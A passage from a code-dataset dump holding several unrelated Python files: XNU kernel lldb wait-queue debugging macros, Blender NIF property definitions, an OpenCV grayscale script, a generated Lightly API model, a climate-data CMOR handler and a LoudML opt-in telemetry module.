print "<<<invalid prepost:{:d}>>>".format(id)
ninv += 1
else:
lt = WaitqTableElemType(wqp)
isvalid = WaitqTableElemValid(wqp)
should_count = 1
if isvalid and opt_post_type > -1 and lt == "LINK":
post_wqp = GetWaitqPrepost(wqp.wqp_post.wqp_wq_id)[0]
post_valid = WaitqTableElemValid(post_wqp)
if opt_post_type == 0 and post_valid: # only count _invalid_ POST objects
should_count = 0
elif opt_post_type == 1 and not post_valid: # only count _valid_ POST objects
should_count = 0
if should_count and (opt_type_filt == "" or opt_type_filt == lt) and ((opt_valid_only == 0 or isvalid)):
if lt == "ELEM":
nwq += 1
elif lt == "LINK":
npost += 1
elif lt == "RSVD":
nrsvd += 1
elif lt == "FREE":
nfree += 1
else:
ninv += 1
if hasattr(wqp, 'wqp_alloc_bt'):
pc = unsigned(wqp.wqp_alloc_bt[opt_bt_idx])
pc_str = str(pc)
if pc > 0:
if pc_str in bt_summary:
bt_summary[pc_str] += 1
else:
bt_summary[pc_str] = 1
if not opt_summary:
print GetWaitqPrepostSummary(wqp)
if verbose:
sys.stderr.write('id: {:d}/{:d}... \r'.format(id, nelem))
id += 1
nused = nwq + npost + nrsvd
nfound = nused + nfree + ninv
print "\nFound {:d} objects: {:d} WQ, {:d} POST, {:d} RSVD, {:d} FREE".format(nfound, nwq, npost, nrsvd, nfree)
if (opt_type_filt == "" and opt_valid_only == 0) and (nused != table.used_elem):
print"\tWARNING: inconsistent state! Table reports {:d}/{:d} used elem, found {:d}/{:d}".format(table.used_elem, nelem, nused, nfound)
if len(bt_summary) > 0:
print "Link allocation BT (frame={:d})".format(opt_bt_idx)
for k,v in bt_summary.iteritems():
print "\t[{:d}] from: {:s}".format(v, GetSourceInformationForAddress(unsigned(k)))
# EndMacro: showallpreposts
@lldb_type_summary(['wq_prepost', 'wq_prepost *'])
@header("{:<18s} {:<18s} {:<19s} {:<10s} {:<1s} {:<4s} {:<10s} {:<20s}".format('addr','id','idx','gen','V','type','refcnt','info'))
def GetWaitqPrepostSummary(wqp):
if not wqp:
return
fmt_str = "{w: <#18x} {w.wqte.lt_id.id: <#18x} {w.wqte.lt_id.idx: <7d} (->{w.wqte.lt_next_idx: <7d}) {w.wqte.lt_id.generation: <#10x} {v: <1s} {t: <4s} {rcnt: <10d} "
type = WaitqTableElemType(wqp)
if type == "ELEM":
type = "WQ"
elif type == "LINK":
type = "POST"
v = "F"
if WaitqTableElemValid(wqp):
v = "T"
refcnt = WaitqTableElemRefcnt(wqp)
out_str = fmt_str.format(w=wqp, v=v, t=type, rcnt=refcnt)
if type == "WQ":
out_str += "wq:{0: <#18x}".format(unsigned(wqp.wqp_wq.wqp_wq_ptr))
elif type == "POST":
out_str += "next:{0: <#18x}, wqid:{1: <#18x}".format(wqp.wqp_post.wqp_next_id, wqp.wqp_post.wqp_wq_id)
post_wqp = GetWaitqPrepost(wqp.wqp_post.wqp_wq_id)[0]
if not WaitqTableElemValid(post_wqp):
out_str += "(<invalid>)"
else:
if WaitqTableElemType(post_wqp) != "ELEM":
out_str += "(!WQP_WQ?)"
else:
out_str += "({0: <#18x})".format(unsigned(post_wqp.wqp_wq.wqp_wq_ptr))
return out_str
# Macro: showprepost
@lldb_command('showprepost', "P:")
def ShowPrepost(cmd_args=None, cmd_options={}):
""" Print prepost structure summary
Note: you can pass either a complete ID (generation + index), or
just the index to the -P argument.
usage: showprepost [-P ID] [0xaddr]
-P {ID} : show prepost structure whose ID is {ID}
"""
wqp = 0
if "-P" in cmd_options:
wqp, warn_str = GetWaitqPrepost(unsigned(kern.GetValueFromAddress(cmd_options["-P"], 'uint64_t *')))
if wqp == 0:
if warn_str != '':
raise LookupError(warn_str)
else:
raise ArgumentError("Invalid prepost ID {:s}".format(cmd_options["-P"]))
if wqp == 0:
if not cmd_args:
raise ArgumentError("Please pass the address of a prepost object")
wqp = kern.GetValueFromAddress(cmd_args[0], 'wq_prepost *')
if not wqp:
raise ArgumentError("Invalid prepost {:s}".format(cmd_args[0]))
print GetWaitqPrepostSummary.header
print GetWaitqPrepostSummary(wqp)
# EndMacro: showprepost
def WaitqPrepostFromObj(wqp, head_id, inv_ok, prepost_str, pp_arr = 0, depth = 0):
if pp_arr != 0:
pp_arr.append(wqp)
etype = WaitqTableElemType(wqp)
if not WaitqTableElemValid(wqp) and not inv_ok:
id = 0
if wqp:
id = wqp.wqte.lt_id.id
prepost_str.append("{0: <#18x}:{1: <18s}".format(id, "<invalid>"))
return
if etype == "ELEM": # WQP_WQ
prepost_str.append("{0: <#18x}:{1: <#18x}".format(wqp.wqte.lt_id.id, unsigned(wqp.wqp_wq.wqp_wq_ptr)))
return
post_wq = 0
if etype == "LINK": # WQP_POST
next_id = wqp.wqp_post.wqp_next_id
post_wq = GetWaitqPrepost(wqp.wqp_post.wqp_wq_id)[0]
if WaitqTableElemValid(post_wq):
if WaitqTableElemType(post_wq) != "ELEM":
prepost_str.append("{0: <#18x}:{1: <18s}".format(post_wq.wqte.lt_id.id, "<invalid post>"))
else:
prepost_str.append("{0: <#18x}:{1: <#18x}".format(wqp.wqte.lt_id.id, unsigned(post_wq.wqp_wq.wqp_wq_ptr)))
if next_id > 0 and next_id != head_id:
if depth >= 950:
prepost_str.append("{: <37s}".format("!recursion limit!"))
return
WaitqPrepostFromObj(GetWaitqPrepost(next_id)[0], head_id, inv_ok, prepost_str, pp_arr, depth + 1)
else: # "RSVD" or "FREE":
prepost_str.append("{0: <#18x} -> {1: <15d}".format(wqp.wqte.lt_id.id, wqp.wqte.lt_next_idx))
next_id = wqp.wqte.lt_next_idx
max_elem = int(kern.globals.g_prepost_table.nelem)
if hasattr(kern.globals, 'g_lt_idx_max'):
max_elem = unsigned(kern.globals.g_lt_idx_max)
if next_id < max_elem:
if depth >= 950:
prepost_str.append("{: <37s}".format("!recursion limit!"))
return
WaitqPrepostFromObj(GetWaitqPrepost(next_id)[0], head_id, inv_ok, prepost_str, pp_arr, depth + 1)
return
def GetPrepostChain(head_id, inv_ok = False, pp_arr = 0):
pp = []
if unsigned(head_id) == 0:
return [ "{0: <#18x}:{1: <18s}".format(head_id, "<invalid>") ]
wqp = GetWaitqPrepost(head_id)[0]
if wqp != 0:
WaitqPrepostFromObj(wqp, head_id, inv_ok, pp, pp_arr)
else:
return [ "{0: <#18x}:{1: <18s}".format(head_id, "<invalid>") ]
return pp
def GetWaitqPreposts(waitq):
if GetWaitqStateStr(waitq) != "SET":
return []
wqset = Cast(waitq, 'waitq_set *')
if wqset.wqset_prepost_id == 0:
return []
return GetPrepostChain(wqset.wqset_prepost_id)
# Macro: showprepostchain
@lldb_command('showprepostchain', "P:")
def ShowPrepostChain(cmd_args=None, cmd_options={}):
""" Follow a chain of preposts, printing each one.
Note that prepost chains are circular, so this will print
the entire chain given a single element.
Note: you can pass either a complete ID (generation + index), or
just the index to the -P argument.
usage: showprepostchain [-P ID] [0xaddr]
-P {ID} : start printing with the prepost whose ID is {ID}
"""
wqp = 0
if "-P" in cmd_options:
wqp, warn_str = GetWaitqPrepost(unsigned(kern.GetValueFromAddress(cmd_options["-P"], 'uint64_t *')))
if wqp == 0:
if warn_str != '':
raise LookupError(warn_str)
else:
raise ArgumentError("Invalid prepost ID {:s}".format(cmd_options["-P"]))
if wqp == 0:
if not cmd_args:
raise ArgumentError("Please pass the address of a prepost object")
wqp = kern.GetValueFromAddress(cmd_args[0], 'wq_prepost *')
if not wqp:
raise ArgumentError("Invalid prepost {:s}".format(cmd_args[0]))
pp_arr = []
GetPrepostChain(wqp.wqte.lt_id.id, True, pp_arr)
pp_cnt = len(pp_arr)
idx = 0
nvalid = 0
ninvalid = 0
print GetWaitqPrepostSummary.header
while idx < pp_cnt:
print GetWaitqPrepostSummary(pp_arr[idx])
if pp_arr[idx] != 0:
type = WaitqTableElemType(pp_arr[idx])
if type == "LINK":
post_wqp = GetWaitqPrepost(pp_arr[idx].wqp_post.wqp_wq_id)[0]
if not WaitqTableElemValid(post_wqp):
ninvalid += 1
else:
nvalid += 1
else:
nvalid += 1
idx += 1
print "%s" % '-'*86
print "Total: {:d} ({:d} valid, {:d} invalid)".format(len(pp_arr), nvalid, ninvalid)
# EndMacro: showprepostchain
@lldb_type_summary(['waitq', 'waitq *'])
@header("{: <16s} {: <3s} {: <4s} {: <17s} {: <18s} {: <18s} {: <37s} {: <22s} {: <10s}".format('waitq', 'typ', 'bits', 'evtmask', 'setid', 'wq_wqp', 'preposts', 'member_of', 'threads'))
def GetWaitqSummary(waitq):
fmt_str = "{q: <16x} {state: <3s} {bits: <4s} {q.waitq_eventmask: <#17x} {setid: <#18x} {q.waitq_prepost_id: <#18x}"
th_str = []
if waitq.waitq_queue.next and waitq.waitq_queue.prev:
for thread in IterateLinkageChain(addressof(waitq.waitq_queue), 'thread *', 'wait_links'):
th_str.append("{: <18s} e:{: <#18x}".format(hex(thread), thread.wait_event))
else:
th_str.append("{: <39s}".format('<invalid (NULL) queue>'))
th_cnt = len(th_str)
set_str = GetWaitqSets(waitq)
set_cnt = len(set_str)
pp_str = GetWaitqPreposts(waitq)
pp_cnt = len(pp_str)
last_str = ''
idx = 0;
while idx < pp_cnt or idx < set_cnt or idx < th_cnt:
p = ""
s = ""
t = ""
if idx < pp_cnt:
p = pp_str[idx]
if idx < set_cnt:
s = set_str[idx]
if idx < th_cnt:
t = th_str[idx]
if idx == 0:
last_str += "{0: <37s} {1: <22s} {2: <39s}".format(p, s, t)
else:
last_str += "\n{0: <80s} {1: <37s} {2: <22s} {3: <39s}".format('', p, s, t)
idx += 1
if pp_cnt > 0 or set_cnt > 0 or th_cnt > 0:
last_str += "\n{:<80s} {: <37s} {: <22s} {: <39s}".format('', '-'*37, '-'*20, '-'*39)
last_str += "\n{0: <80s} {1: <37d} {2: <22d} {3: <39d}".format('', pp_cnt, set_cnt, th_cnt)
state = GetWaitqStateStr(waitq)
setid = 0
if state == "SET":
setid = Cast(waitq, 'waitq_set *').wqset_id
out_str = fmt_str.format(q=waitq, state=state, bits=GetWaitqBitsStr(waitq), setid=setid)
out_str += last_str
return out_str
# Macro: showwaitq
@lldb_command('showwaitq', "P:S:")
def ShowWaitq(cmd_args=None, cmd_options={}):
""" Print waitq structure summary.
Lookup the waitq either by address, by Set ID, or indirectly
through a prepost object that points to the waitq.
Note: you can pass either a complete ID (generation + index), or
just the index to the -P and -S arguments.
usage: showwaitq [-P PrePostID] [-S SetID] [0xaddr]
-P {ID} : prepost ID that points to a waitq
-S {ID} : waitq_set ID
"""
waitq = 0
if "-P" in cmd_options:
wqp, warn_str = GetWaitqPrepost(unsigned(kern.GetValueFromAddress(cmd_options["-P"], 'uint64_t *')))
if wqp == 0:
if warn_str:
raise LookupError(warn_str)
else:
raise ArgumentError("Invalid prepost ID {:s}".format(cmd_options["-P"]))
if WaitqTableElemType(wqp) != "ELEM":
raise ArgumentError("Prepost ID {:s} points to a WQP_POST object, not a WQP_WQ!".format(cmd_options["-P"]))
waitq = wqp.wqp_wq.wqp_wq_ptr
if "-S" in cmd_options:
if waitq:
raise ArgumentError("Please pass only one of '-S' or '-P'!")
link, warn_str = GetWaitqLink(unsigned(kern.GetValueFromAddress(cmd_options["-S"],'uint64_t *')))
if not link:
if warn_str != '':
raise LookupError(warn_str)
else:
raise ArgumentError("Invalid link ID {:s}".format(cmd_options["-S"]))
if WaitqTableElemType(link) != "ELEM":
raise ArgumentError("Link ID {:s} points to a SLT_LINK object, not an SLT_WQS!".format(cmd_options["-S"]))
waitq = addressof(link.wql_wqs.wql_set.wqset_q)
if not waitq and not cmd_args:
raise ArgumentError("Please pass the address of a waitq!")
if not waitq:
waitq = kern.GetValueFromAddress(cmd_args[0], 'waitq *')
if not waitq:
raise ("Unknown arguments: %r %r" % (cmd_args, cmd_options))
print GetWaitqSummary.header
print GetWaitqSummary(waitq)
# EndMacro: showwaitq
# Macro: showglobalwaitqs
@lldb_command('showglobalwaitqs')
def ShowGlobalWaitqs(cmd_args=None):
""" Summarize global waitq usage
"""
global kern
q = 0
print "Global waitq objects"
print GetWaitqSummary.header
while q < kern.globals.g_num_waitqs:
print GetWaitqSummary(addressof(kern.globals.global_waitqs[q]))
q = q + 1
# EndMacro: showglobalwaitqs
# Macro: showglobalqstats
@lldb_command('showglobalqstats', "OF")
def ShowGlobalQStats(cmd_args=None, cmd_options={}):
""" Summarize global waitq statistics
usage: showglobalqstats [-O] [-F]
-O : only output waitqs with outstanding waits
-F : output as much backtrace as was recorded
"""
global kern
q = 0
if not hasattr(kern.globals, 'g_waitq_stats'):
print "No waitq stats support (use DEVELOPMENT kernel)!"
return
print "Global waitq stats"
print "{0: <18s} {1: <8s} {2: <8s} {3: <8s} {4: <8s} {5: <8s} {6: <32s}".format('waitq', '#waits', '#wakes', '#diff', '#fails', '#clears', 'backtraces')
waiters_only = False
full_bt = False
if "-O" in cmd_options:
waiters_only = True
if "-F" in cmd_options:
full_bt = True
fmt_str = "{q: <#18x} {stats.waits: <8d} {stats.wakeups: <8d} {diff: <8d} {stats.failed_wakeups: <8d} {stats.clears: <8d} {bt_str: <s}"
while q < kern.globals.g_num_waitqs:
waitq = kern.globals.global_waitqs[q]
stats = kern.globals.g_waitq_stats[q]
diff = stats.waits - stats.wakeups
if diff == 0 and waiters_only:
q = q + 1
continue
last_waitstr = ''
last_wakestr = ''
fw_str = ''
if (stats.last_wait[0]):
last_waitstr = GetSourceInformationForAddress(unsigned(stats.last_wait[0]))
if (stats.last_wakeup[0]):
last_wakestr = GetSourceInformationForAddress(unsigned(stats.last_wakeup[0]))
if (stats.last_failed_wakeup[0]):
fw_str = GetSourceInformationForAddress(unsigned(stats.last_failed_wakeup[0]))
if full_bt:
f = 1
while f < kern.globals.g_nwaitq_btframes:
if stats.last_wait[f]:
last_waitstr = "{0}->{1}".format(GetSourceInformationForAddress(unsigned(stats.last_wait[f])), last_waitstr)
if stats.last_wakeup[f]:
last_wakestr = "{0}->{1}".format(GetSourceInformationForAddress(unsigned(stats.last_wakeup[f])), last_wakestr)
if stats.last_failed_wakeup[f]:
fw_str = "{0}->{1}".format(GetSourceInformationForAddress(unsigned(stats.last_failed_wakeup[f])), fw_str)
f = f + 1
bt_str = ''
if last_waitstr:
bt_str += "wait : " + last_waitstr
if last_wakestr:
if bt_str:
bt_str += "\n{0: <70s} ".format('')
bt_str += "wake : " + last_wakestr
if fw_str:
if bt_str:
bt_str += "\n{0: <70s} ".format('')
bt_str += "fails: " + fw_str
print fmt_str.format(q=addressof(waitq), stats=stats, diff=diff, bt_str=bt_str)
q = q + 1
# EndMacro: showglobalqstats
| 39.878505 | 186 | 0.556269 |
a35b09a17430d5ac93f8035c4cc4f7dadf67b539 | 6,561 | py | Python | io_scene_niftools/properties/object.py | ZtModArchive/blender_niftools_addon | fc28f567e1fa431ec6633cb2a138898136090b29 | [
"BSD-3-Clause"
] | 3 | 2019-10-13T19:08:12.000Z | 2020-03-26T08:25:20.000Z | io_scene_niftools/properties/object.py | ZtModArchive/blender_niftools_addon | fc28f567e1fa431ec6633cb2a138898136090b29 | [
"BSD-3-Clause"
] | 1 | 2019-09-22T12:00:04.000Z | 2019-09-22T12:00:04.000Z | io_scene_niftools/properties/object.py | ZtModArchive/blender_niftools_addon | fc28f567e1fa431ec6633cb2a138898136090b29 | [
"BSD-3-Clause"
] | null | null | null | """ Nif User Interface, custom nif properties for objects"""
# ***** BEGIN LICENSE BLOCK *****
#
# Copyright © 2014, NIF File Format Library and Tools contributors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the NIF File Format Library and Tools
# project nor the names of its contributors may be used to endorse
# or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# ***** END LICENSE BLOCK *****
import bpy
from bpy.props import (PointerProperty,
StringProperty,
IntProperty,
EnumProperty,
CollectionProperty,
FloatProperty
)
from bpy.types import PropertyGroup, Object
from pyffi.formats.nif import NifFormat
from io_scene_niftools.utils.decorators import register_classes, unregister_classes
prn_array = [
["OBLIVION", "FALLOUT_3", "SKYRIM"],
["DAGGER", "SideWeapon", "Weapon", "WeaponDagger"],
["2HANDED", "BackWeapon", "Weapon", "WeaponBack"],
["BOW", "BackWeapon", None, "WeaponBow"],
["MACE", "SideWeapon", "Weapon", "WeaponMace"],
["SHIELD", "Bip01 L ForearmTwist", None, "SHIELD"],
["STAFF", "Torch", "Weapon", "WeaponStaff"],
["SWORD", "SideWeapon", "Weapon", "WeaponSword"],
["AXE", "SideWeapon", "Weapon", "WeaponAxe"],
["QUIVER", "Quiver", "Weapon", "QUIVER"],
["TORCH", "Torch", "Weapon", "SHIELD"],
["HELMET", "Bip01 Head", "Bip01 Head", "NPC Head [Head]"],
["RING", "Bip01 R Finger1", "Bip01 R Finger1", "NPC R Finger10 [RF10]"]
]
# PRN_DICT is a dict like so: dict['SLOT']['GAME']: 'Bone'
PRN_DICT = {}
for row in prn_array[1:]:
PRN_DICT[row[0]] = dict(zip(prn_array[0], row[1:]))
class ExtraData(PropertyGroup):
name: StringProperty()
data: StringProperty()
sub_class: StringProperty()
class BSXFlags:
# type = NifFormat.BSXFlags()
# data = {}
def __init__(self):
self.name = "BSXFlag"
class ExtraDataStore(PropertyGroup):
extra_data_index: IntProperty()
extra_data: CollectionProperty(
name="Extra Data",
description="Used to store all the Extra data",
type=ExtraData
)
class ObjectProperty(PropertyGroup):
rootnode: EnumProperty(
name='Nif Root Node',
description='Type of property used to display meshes',
items=(
('NiNode', 'NiNode', "", 0),
('BSFadeNode', 'BSFadeNode', "", 1)),
default='NiNode',
)
prn_location: EnumProperty(
name='Weapon Location',
description='Attachment point of weapon, for Skyrim, FO3 & Oblivion',
items=[(item, item, "", i) for i, item in enumerate(["NONE"] + list(PRN_DICT.keys()))],
# default = 'NONE'
)
longname: StringProperty(
name='Nif Long Name'
)
consistency_flags: EnumProperty(
name='Consistency Flag',
description='Controls animation type',
items=[(item, item, "", i) for i, item in enumerate(NifFormat.ConsistencyType._enumkeys)],
# default = 'SHADER_DEFAULT'
)
flags: IntProperty(
name='Object Flag',
description='Controls animation and collision',
default=0
)
bsxflags: IntProperty(
name='BSX Flags',
description='Controls animation and collision',
default=0 # 2 = Bit 1, enable collision
)
upb: StringProperty(
name='UPB',
description='Commands for an optimizer?',
default=''
)
extra_data_store: PointerProperty(
name="Extra Data",
description="Used to store all the Extra data",
type=ExtraDataStore,
)
skeleton_root: StringProperty(
name='Skeleton Root',
description="The bone that acts as the root of the SkinInstance",
)
class BsInventoryMarker(PropertyGroup):
name: StringProperty(
name="",
default='INV'
)
bs_inv_x: FloatProperty(
name="Inv X value",
description="Rotation of object in inventory around the x axis",
default=0,
subtype = "ANGLE"
)
bs_inv_y: FloatProperty(
name="Inv Y value",
description="Rotation of object in inventory around the y axis",
default=0,
subtype = "ANGLE"
)
bs_inv_z: FloatProperty(
name="Inv Z value",
description="Rotation of object in inventory around the z axis",
default=0,
subtype = "ANGLE"
)
bs_inv_zoom: FloatProperty(
name="Inv Zoom Value",
description="Inventory object Zoom level",
default=1
)
CLASSES = [
ExtraData,
ExtraDataStore,
ObjectProperty,
BsInventoryMarker
]
def register():
register_classes(CLASSES, __name__)
bpy.types.Object.niftools = bpy.props.PointerProperty(type=ObjectProperty)
bpy.types.Object.niftools_bs_invmarker = bpy.props.CollectionProperty(type=BsInventoryMarker)
def unregister():
del bpy.types.Object.niftools
del bpy.types.Object.niftools_bs_invmarker
unregister_classes(CLASSES, __name__)
| 30.235023 | 98 | 0.637098 |
035af7ad1ec4150ab8b22f99fb860ae769afff87 | 317 | py | Python | img2Grey.py | Andre-luv/HCAP2021-EQUIPOS | c6a12b9796417a0516e5bf2bea9237a8809572b8 | [
"MIT"
] | null | null | null | img2Grey.py | Andre-luv/HCAP2021-EQUIPOS | c6a12b9796417a0516e5bf2bea9237a8809572b8 | [
"MIT"
] | null | null | null | img2Grey.py | Andre-luv/HCAP2021-EQUIPOS | c6a12b9796417a0516e5bf2bea9237a8809572b8 | [
"MIT"
] | 1 | 2021-03-19T18:55:32.000Z | 2021-03-19T18:55:32.000Z | import cv2
import numpy as np
def img2Grey(original,nombre):
IRGB= cv2.imread(original)
IGS=cv2.cvtColor(IRGB,cv2.COLOR_BGR2GRAY)
return cv2.imwrite(nombre,IGS)
img2Grey("002.jpeg","002GS.jpeg")
img2Grey("003.jpeg","003GS.jpeg")
img2Grey("008.jpeg","008GS.jpeg")
img2Grey("011.jpeg","011GS.jpeg")
| 16.684211 | 45 | 0.712934 |
55d1d94c0d22fad7e8f1aeb30e709678fb8fc844 | 3,895 | py | Python | lightly/openapi_generated/swagger_client/models/update_docker_worker_registry_entry_request.py | CodeGuy-007/lightly | 64143fe8a477c04288009c65fa1265cef8aa48f8 | [
"MIT"
] | 1 | 2022-03-10T00:22:30.000Z | 2022-03-10T00:22:30.000Z | lightly/openapi_generated/swagger_client/models/update_docker_worker_registry_entry_request.py | CodeGuy-007/lightly | 64143fe8a477c04288009c65fa1265cef8aa48f8 | [
"MIT"
] | null | null | null | lightly/openapi_generated/swagger_client/models/update_docker_worker_registry_entry_request.py | CodeGuy-007/lightly | 64143fe8a477c04288009c65fa1265cef8aa48f8 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Lightly API
Lightly.ai enables you to do self-supervised learning in an easy and intuitive way. The lightly.ai OpenAPI spec defines how one can interact with our REST API to unleash the full potential of lightly.ai # noqa: E501
OpenAPI spec version: 1.0.0
Contact: support@lightly.ai
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from lightly.openapi_generated.swagger_client.configuration import Configuration
class UpdateDockerWorkerRegistryEntryRequest(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'state': 'DockerWorkerState'
}
attribute_map = {
'state': 'state'
}
def __init__(self, state=None, _configuration=None): # noqa: E501
"""UpdateDockerWorkerRegistryEntryRequest - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._state = None
self.discriminator = None
self.state = state
@property
def state(self):
"""Gets the state of this UpdateDockerWorkerRegistryEntryRequest. # noqa: E501
:return: The state of this UpdateDockerWorkerRegistryEntryRequest. # noqa: E501
:rtype: DockerWorkerState
"""
return self._state
@state.setter
def state(self, state):
"""Sets the state of this UpdateDockerWorkerRegistryEntryRequest.
:param state: The state of this UpdateDockerWorkerRegistryEntryRequest. # noqa: E501
:type: DockerWorkerState
"""
if self._configuration.client_side_validation and state is None:
raise ValueError("Invalid value for `state`, must not be `None`") # noqa: E501
self._state = state
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(UpdateDockerWorkerRegistryEntryRequest, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateDockerWorkerRegistryEntryRequest):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, UpdateDockerWorkerRegistryEntryRequest):
return True
return self.to_dict() != other.to_dict()
| 31.16 | 220 | 0.607445 |
1b9e7c787563446417d53dd66b47ca6c4dcc784e | 1,987 | py | Python | e3sm_to_cmip/cmor_handlers/dryso4.py | JGCRI/e3sm_to_cmip | 3d3bc7dd7e3a46a97dba4f13a888758e01ef4797 | [
"MIT"
] | null | null | null | e3sm_to_cmip/cmor_handlers/dryso4.py | JGCRI/e3sm_to_cmip | 3d3bc7dd7e3a46a97dba4f13a888758e01ef4797 | [
"MIT"
] | null | null | null | e3sm_to_cmip/cmor_handlers/dryso4.py | JGCRI/e3sm_to_cmip | 3d3bc7dd7e3a46a97dba4f13a888758e01ef4797 | [
"MIT"
] | null | null | null | """
so4_a1DDF + so4_a2DDF + so4_a3DDF + so4_c1DDF + so4_c2DDF + so4_c3DDF to dryso4 converter
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import cmor
from e3sm_to_cmip.lib import handle_variables
# list of raw variable names needed
RAW_VARIABLES = [str('so4_a1DDF'), str('so4_a2DDF'), str('so4_a3DDF'), str('so4_c1DDF'), str('so4_c2DDF'), str('so4_c3DDF')]
VAR_NAME = str('dryso4')
VAR_UNITS = str('kg m-2 s-1')
TABLE = str('CMIP6_AERmon.json')
def write_data(varid, data, timeval, timebnds, index, **kwargs):
"""
dryso4 = so4_a1DDF + so4_a2DDF + so4_a3DDF + so4_c1DDF + so4_c2DDF + so4_c3DDF
"""
outdata = data['so4_a1DDF'][index, :] + data['so4_a2DDF'][index, :] + data['so4_a3DDF'][index, :] + \
data['so4_c1DDF'][index, :] + data['so4_c2DDF'][index, :] + data['so4_c3DDF'][index, :]
if kwargs.get('simple'):
return outdata
cmor.write(
varid,
outdata,
time_vals=timeval,
time_bnds=timebnds)
# ------------------------------------------------------------------
def handle(infiles, tables, user_input_path, **kwargs):
"""
Parameters
----------
infiles (List): a list of strings of file names for the raw input data
tables (str): path to CMOR tables
user_input_path (str): path to user input json file
Returns
-------
var name (str): the name of the processed variable after processing is complete
"""
return handle_variables(
metadata_path=user_input_path,
tables=tables,
table=kwargs.get('table', TABLE),
infiles=infiles,
raw_variables=RAW_VARIABLES,
write_data=write_data,
outvar_name=VAR_NAME,
outvar_units=VAR_UNITS,
serial=kwargs.get('serial'),
logdir=kwargs.get('logdir'),
simple=kwargs.get('simple'),
outpath=kwargs.get('outpath'))
# ------------------------------------------------------------------
| 34.258621 | 124 | 0.598893 |
8f939dfe72bfd835138ef6558782b49ed85b6ae5 | 1,975 | py | Python | loudml/metrics.py | toni-moreno/loudml | 0252b6792393fc46f2dc9c1da25dd89fc27a5fa4 | [
"Apache-2.0"
] | 245 | 2018-01-30T08:11:53.000Z | 2022-03-26T07:17:42.000Z | loudml/metrics.py | robcowart/loudml | 0008baef02259a8ae81dd210d3f91a51ffc9ed9f | [
"Apache-2.0"
] | 620 | 2018-01-28T22:58:24.000Z | 2022-03-13T13:40:42.000Z | loudml/metrics.py | robcowart/loudml | 0008baef02259a8ae81dd210d3f91a51ffc9ed9f | [
"Apache-2.0"
] | 97 | 2018-03-06T14:44:26.000Z | 2022-03-24T01:57:31.000Z | """
Collect and send metrics about program usage
"""
from configparser import (
ConfigParser, NoSectionError
)
import io
import pkg_resources
import requests
from loudml.misc import my_host_id
# Workaround for ConfigParser requiring sections
# https://mail.python.org/pipermail/python-dev/2002-November/029987.html
class MyConfigParser(ConfigParser):
def read(self, filename):
try:
text = open(filename).read()
except IOError:
pass
else:
file = io.StringIO("[os-release]\n" + text)
self.readfp(file, filename)
def safe_get(self, section, val):
# Issue #208: /etc/os-release not always present
# On macOS it is: /System/Library/CoreServices/SystemVersion.plist
# TODO: consider more granular OS release extraction
try:
return self.get(section, val)
except NoSectionError:
return "N/A"
def send_metrics(config, storage, user_agent="loudmld"):
"""
Send usage information to telemetry server
:param config: telemetry configuration
:type config: dict
:param storage: storage backend
:type storage: loudml.Storage
:param user_agent: HTTP request user agent
:type user_agent: str
"""
if not config['enable']:
return
os_release = MyConfigParser()
os_release.read("/etc/os-release")
url = 'http://telemetry.loudml.io/api'
data = {
'host_id': my_host_id(),
'loudml': {
'distribution': os_release.safe_get("os-release", "NAME"),
'nr_models': len(storage.list_models()),
'version': pkg_resources.get_distribution("loudml").version,
},
}
headers = {
'user-agent': user_agent,
}
try:
requests.post(url, json=data, headers=headers)
except Exception:
# Ignore error as it may be expected in some environments (offline...)
pass
| 27.430556 | 78 | 0.623291 |
135cb746715061e52959abefe5188ce35acbd47e | 357 | py | Python | ia870/ialastero.py | bfoe/e2dhipseg | 4f6cbfd77bde2f92835c7007a230c08829f1845a | [
"MIT"
